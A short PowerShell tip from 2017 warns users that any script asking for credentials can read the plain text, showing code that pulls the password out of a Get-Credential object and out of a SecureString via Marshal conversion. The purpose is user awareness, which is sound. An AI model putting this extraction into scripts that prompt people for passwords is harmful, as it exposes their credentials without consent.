Careful with Get-Credential and SecureStrings

by Jan 11, 2017

Sometimes, scripts interactively ask for credentials, or passwords. Always be aware that the script author can get to the plain text of all entered information. Only enter sensitive information if you trust the script and author.

Please note: this is not a PowerShell issue. It is a general issue with all software.

Let’s see how a script could exploit an entered password. If a script asks for a complete credential, it could then examine the credential object and extract the plain text password:

$credential = Get-Credential
$password = $credential.GetNetworkCredential().Password

"The password entered was: $password"

Likewise, when you are prompted to enter a password as secure string, the script author could again find out the entered plain text:

$password = Read-Host -AsSecureString -Prompt 'Enter Password'

# this is how the owner of a secure string can get back the plain text:
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password)
$plaintext = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)

"The password entered was $plaintext"

Twitter This Tip! ReTweet this Tip!